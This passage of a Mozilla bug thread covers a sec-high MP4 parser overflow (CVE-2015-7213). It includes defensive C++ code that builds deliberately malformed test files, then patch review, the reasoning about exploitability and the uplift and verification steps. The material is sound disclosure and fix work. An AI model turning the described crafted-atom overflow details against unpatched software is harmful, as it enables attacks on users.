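        if (h.type == "ftyp" || h.type == "moov") consumed->push_back(h.type);
        offset += h.size;  // size >= 8 guarantees forward progress
    }
    return true;
}

// Appends one box with a 32-bit size field and a zero-filled payload;
// `forcedSize` lets a sample file carry a deliberately wrong size.
static void AppendBox(std::vector<uint8_t>* buf, const char* type,
                      size_t payloadLen, uint32_t forcedSize = 0) {
    uint32_t size = forcedSize ? forcedSize : uint32_t(8 + payloadLen);
    const uint8_t sz[4] = {uint8_t(size >> 24), uint8_t(size >> 16),
                           uint8_t(size >> 8), uint8_t(size)};
    buf->insert(buf->end(), sz, sz + 4);
    buf->insert(buf->end(), type, type + 4);
    buf->insert(buf->end(), payloadLen, uint8_t(0));
}

// Constructed file: ftyp, a free box that should be skipped, then moov.
std::vector<uint8_t> BuildSampleFile() {
    std::vector<uint8_t> f;
    AppendBox(&f, "ftyp", 8);
    AppendBox(&f, "free", 8);
    AppendBox(&f, "moov", 4);
    return f;
}

// Constructed file whose moov claims a size of 4, smaller than its header.
std::vector<uint8_t> BuildUndersizedBoxFile() {
    std::vector<uint8_t> f;
    AppendBox(&f, "ftyp", 8);
    AppendBox(&f, "moov", 4, 4);
    return f;
}

// Constructed file whose moov claims 0x100 bytes but only 12 are present.
std::vector<uint8_t> BuildTruncatedBoxFile() {
    std::vector<uint8_t> f;
    AppendBox(&f, "ftyp", 8);
    AppendBox(&f, "moov", 4, 0x100);
    return f;
}

int main() {
    std::vector<std::string> consumed;
    bool ok = WalkTopLevel(BuildSampleFile(), &consumed);
    std::printf("%s, consumed %zu boxes\n", ok ? "valid" : "rejected", consumed.size());
    return 0;
}
```

Because every size is validated against the header length, the cap and the remaining file length before the offset advances, a box placed between ftyp and moov (where the PoC's pssh data lives) is stepped over without its contents ever being read, and a moov whose declared size cannot be satisfied stops the walk with an error instead of an oversized read.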
Attachment #8665247 - Flags: review?(ajones) → review+
Attachment #8665248 - Flags: review?(ajones) → review+
Comment on attachment 8665247 [details] [diff] [review]
P1. Ensure operation can't overflow.

[Security approval request comment]

How easily could an exploit be constructed based on the patch?
I don't believe they can in 41 and later with this POC.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?
It's fairly generic; do mention

Which older supported branches are affected by this flaw?
40 and earlier. esr38 is affected.

If not all supported branches, which bug introduced the flaw?
The stagefright one, over 1.5 years ago.

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?
Patch should apply on 38.

How likely is this patch to cause regressions; how much testing does it need?
None; we've applied the same logic elsewhere (limiting size to 2GiB)
Attachment #8665247 - Flags: sec-approval?
Assignee: nobody → jyavenard
!@#$@#$!~@#$ I pushed another patch in my queue, not realising that this one was in it, and it got pushed :(

https://hg.mozilla.org/integration/mozilla-inbound/rev/708cf76b6cb4
https://hg.mozilla.org/integration/mozilla-inbound/rev/680e1f669ea5

:(
(In reply to Jean-Yves Avenard [:jya] from comment #16)
> !@#$@#$!~@#$ I pushed another patch in my queue, not realising that this one
> was in it, and it got pushed :(
>
> https://hg.mozilla.org/integration/mozilla-inbound/rev/708cf76b6cb4
> https://hg.mozilla.org/integration/mozilla-inbound/rev/680e1f669ea5
>
> :(

Per talking to dveditz on IRC, we let this check-in stay and are not backing it out so far.
(In reply to Jean-Yves Avenard [:jya] from comment #14)
> So what I was saying (though will do in a shorter version)
>
> While I could see how we could think it would happen theoretically, it can
> no longer happen following bug 1196398 (which is in 41 onward).
> We only ever parse the ftyp and moov atoms ; anything in between is ignored.
> And as such, with this POC.mp4 you'll find that mPssh is an empty array.
>
> We no longer support encrypted MP4 outside fragmented mp4 and MSE ; as such
> we don't attempt to parse pssh atoms ; we use the MoofParser for this which
> doesn't have this vulnerability.
>
> Now you could attempt to craft a mp4 where those pssh would be within the
> moov atom; but for this to work, you would need the moov atom to have a size
> > 2GB which isn't possible and would cause a decoding error.
>
> We could make the moov atom the last atom and make it with a size of 0
> (which normally means: read to the end). However, stagefright doesn't
> support those and will return also an error as it will error if the atom
> size is below 8.
>
> As such, this vulnerability doesn't apply in 41 and later.

That's the conclusion I came to after trying the POC on 41 yesterday.
We need a security rating on this issue. This looks like an exploitable crash from an overflow. Is that right? Am I correct in reading that we are *only* wanting this bug on ESR38, despite screw ups of checkins? :-)
Flags: needinfo?(jyavenard)
Group: core-security → media-core-security
(In reply to Al Billings [:abillings] from comment #19)
> We need a security rating on this issue. This looks like an exploitable
> crash from an overflow. Is that right?

Hard to tell really. Just as severe as all the other stagefright overflows. Probably more so because it's very easy to control what is going to be copied, as the code simply replicates the content of the mp4 atoms.

> Am I correct in reading that we are *only* wanting this bug on ESR38,
> despite screw ups of checkins? :-)

Yes, only for ESR38
Flags: needinfo?(jyavenard)
Flags: sec-bounty? → sec-bounty+
Keywords: sec-high
Comment on attachment 8665247 [details] [diff] [review] P1. Ensure operation can't overflow. sec-approval+. Can you nominate for ESR38?
Attachment #8665247 - Flags: sec-approval? → sec-approval+
Group: media-core-security → core-security-release
Since libstagefright is a Google lib (I think!), I have reported this bug also at https://code.google.com/p/chromium/issues/detail?id=539372 .
This was supposed to have landed in the ESR release, let's not miss this one too.
ni? just to make sure releng is tracking this bug
Flags: needinfo?(rkothari)
As this bug is needed before bug 1216748, I've checked the patches for landing on Beta-43 (the original patches just work) and ESR-38 (new patches submitted above). Note that they are already in Aurora-44, so no need to uplift them there.
Gerald, could you please nominate the ESR38 patch for uplift?
Flags: needinfo?(rkothari) → needinfo?(gsquelart)
Comment on attachment 8694544 [details] [diff] [review]
Bug-1206211-P1-Ensure-operation-cant-overflow-rken-ESR38.patch

[Approval Request Comment]
If this is not a sec:{high,crit} bug, please state case for ESR consideration: It is sec-high.
User impact if declined: Potential OOMs, crashes with bad MP4 files.
Fix Landed on Version: 44
Risk to taking this patch (and alternatives if risky): Very little, it's only added checks with parsing bailouts.
String or UUID changes made by this patch: None.
Attachment #8694544 - Flags: approval-mozilla-esr38?
Comment on attachment 8694545 [details] [diff] [review]
Bug-1206211-P2-Abort-on-OOM-rkentuckyfriedtakahe-ESR38.patch

[Approval Request Comment]
If this is not a sec:{high,crit} bug, please state case for ESR consideration: It is sec-high.
User impact if declined: Potential OOMs, crashes with bad MP4 files.
Fix Landed on Version: 44
Risk to taking this patch (and alternatives if risky): Very little, it's only added checks with parsing bailouts.
String or UUID changes made by this patch: None.
Flags: needinfo?(gsquelart)
Attachment #8694545 - Flags: approval-mozilla-esr38?
Gerald does this need uplift to beta as well? Which patches? Thanks.
Flags: needinfo?(gsquelart)
Comment on attachment 8694544 [details] [diff] [review] Bug-1206211-P1-Ensure-operation-cant-overflow-rken-ESR38.patch Please uplift to beta, avoids crash from corrupt mp3 files.
Attachment #8694544 - Flags: approval-mozilla-esr38? → approval-mozilla-esr38+
Comment on attachment 8694545 [details] [diff] [review] Bug-1206211-P2-Abort-on-OOM-rkentuckyfriedtakahe-ESR38.patch This should also uplift to beta to avoid OOM crashes from mpeg4.
Attachment #8694545 - Flags: approval-mozilla-esr38? → approval-mozilla-esr38+
Marking this as affected for 43 and accepting beta uplifts since I talked with Gerald on irc.
Flags: needinfo?(gsquelart)
Comment on attachment 8694545 [details] [diff] [review] Bug-1206211-P2-Abort-on-OOM-rkentuckyfriedtakahe-ESR38.patch Re-setting esr flag for sylvestre to handle, as I meant to set the approval for beta!
Attachment #8694545 - Flags: approval-mozilla-esr38?
Attachment #8694545 - Flags: approval-mozilla-esr38+
Attachment #8694545 - Flags: approval-mozilla-beta+
Comment on attachment 8694544 [details] [diff] [review] Bug-1206211-P1-Ensure-operation-cant-overflow-rken-ESR38.patch Fixing this to be an approval for beta, not esr.
Attachment #8694544 - Flags: approval-mozilla-esr38?
Attachment #8694544 - Flags: approval-mozilla-esr38+
Attachment #8694544 - Flags: approval-mozilla-beta+
This failed to apply to beta and aurora with:

adding 1206211-P1-beta.patch to series file
applying 1206211-P1-beta.patch
patching file media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp
Hunk #1 FAILED at 502
1 out of 1 hunks FAILED -- saving rejects to file media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp.rej
patch failed, unable to continue (try -v)
patch failed, rejects left in working directory

Could you take a look? Thanks!
Flags: needinfo?(jyavenard)
Working on it and bug 1216748.
Flags: needinfo?(jyavenard)
Comment on attachment 8665247 [details] [diff] [review] P1. Ensure operation can't overflow. (Requesting beta on the correct patches)
Attachment #8665247 - Flags: approval-mozilla-beta?
Comment on attachment 8665248 [details] [diff] [review] P2. Abort on OOM. (Requesting beta on the correct patches)
Attachment #8665248 - Flags: approval-mozilla-beta?
Comment on attachment 8665247 [details] [diff] [review] P1. Ensure operation can't overflow. Please uplift this patch to beta. My mistake!
Attachment #8665247 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
Comment on attachment 8665248 [details] [diff] [review] P2. Abort on OOM. This should uplift to beta, I had the wrong patch in the last request.
Attachment #8665248 - Flags: approval-mozilla-beta? → approval-mozilla-beta+
(In reply to Carsten Book [:Tomcat] from comment #38)
> this failed to apply to beta and aurora [...]

Beta should now work, with the correct patches. But please don't try and uplift them to aurora, as they're already there.
Another ESR38 affected sec-high that hasn't been approved and checked in...
Flags: needinfo?(sledru)
Flags: needinfo?(lhenry)
Whiteboard: [adv-main43+]
Comment on attachment 8694545 [details] [diff] [review] Bug-1206211-P2-Abort-on-OOM-rkentuckyfriedtakahe-ESR38.patch taking it too in esr.
Flags: needinfo?(sledru)
Flags: needinfo?(lhenry)
Attachment #8694545 - Flags: approval-mozilla-esr38? → approval-mozilla-esr38+
Failed to apply to esr:

patching file media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp
Hunk #1 FAILED at 511
1 out of 1 hunks FAILED -- saving rejects to file media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp.rej
patch failed, unable to continue (try -v)
patch failed, rejects left in working directory
errors during apply, please fix and qrefresh 1206211.patch
Flags: needinfo?(jyavenard)
Sylvestre, you left Bug-1206211-P1-Ensure-operation-cant-overflow-rken-ESR38.patch as "esr38?", could you please approve it? (Or is it implied by the approval of the 2nd patch?)

Carsten, to be sure: Did you try and commit both *-ESR38.patch files? I've tried locally and they just worked.
Flags: needinfo?(jyavenard) → needinfo?(sledru)
(In reply to Gerald Squelart [:gerald] from comment #49)
> Carsten, to be sure: Did you try and commit both *-ESR38.patch files? I've
> tried locally and they just worked.

Also, once these patches land, please check-in bug 1216748 patches (all those with esr38+). Thank you!
Please contact me if you're still having troubles.
Flags: needinfo?(cbook)
Comment on attachment 8694544 [details] [diff] [review] Bug-1206211-P1-Ensure-operation-cant-overflow-rken-ESR38.patch This was a typo, sorry
Flags: needinfo?(sledru)
Attachment #8694544 - Flags: approval-mozilla-esr38? → approval-mozilla-esr38+
(In reply to Gerald Squelart [:gerald] from comment #50)
> (In reply to Gerald Squelart [:gerald] from comment #49)
> > Carsten, to be sure: Did you try and commit both *-ESR38.patch files? I've
> > tried locally and they just worked.
>
> Also, once these patches land, please check-in bug 1216748 patches (all
> those with esr38+). Thank you!
> Please contact me if you're still having troubles.

Oh sorry, I missed that 2nd patch when I tried first, but now with the 2nd patch and approval :) all is good and landed as

https://hg.mozilla.org/releases/mozilla-esr38/rev/f710e2e351b9
https://hg.mozilla.org/releases/mozilla-esr38/rev/75343b2f90f4
Flags: needinfo?(cbook)
Alias: CVE-2015-7213
Whiteboard: [adv-main43+] → [adv-main43+][adv-esr38.5+]
Reproduced this issue on Windows 10 x64 with Firefox 40 beta 8, using the attached poc. Confirming the fix for:
* 44 beta 9, build ID: 20160114165817
* 43.0.3, build ID: 20151223140742
* latest 38.5.2esr tinderbox, build ID: 20160114062730
Status: RESOLVED → VERIFIED
QA Contact: cornel.ionce
Group: core-security-release